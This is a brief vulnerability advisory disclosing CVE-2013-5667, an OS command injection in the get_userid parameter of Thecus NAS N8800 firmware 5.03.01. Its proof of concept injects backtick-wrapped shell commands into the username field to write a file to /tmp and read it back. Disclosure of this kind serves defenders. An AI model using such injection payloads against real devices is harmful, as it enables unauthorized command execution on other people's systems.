CVE-2013-5667 Thecus OS Command Injection

Advisory Information

Title: Thecus NAS Server N8800 Firmware 5.03.01 get_userid OS Command Injection
Date published: August 2013
Ref: CVE-2013-5667 CWE-78

Advisory Summary

A lack of input validation allows an attacker to execute OS commands directly on the operating system.

Vendor

Thecus

Affected Software

NAS Server N8800 Firmware 5.03.01

Description of Issue

The application accepts user input through the get_userid parameter that can be used to create OS commands that are redirected to the operating system. An attacker can use this flaw to execute arbitrary commands.

PoC

Standard request:

get_userid=1&username=admin

Response:

{“get_userid”:”1001″,”groupname”:false,”data”:[]}

Command Injection PoC:

1. Write value for user admin to /tmp

get_userid=1&username=admin`echo+admin+>+/tmp/xpto`

2. Display value of /tmp

get_userid=1&username=`cat+/tmp/xpto`

Response:

{“get_userid”:”1001″,”groupname”:false,”data”:[]}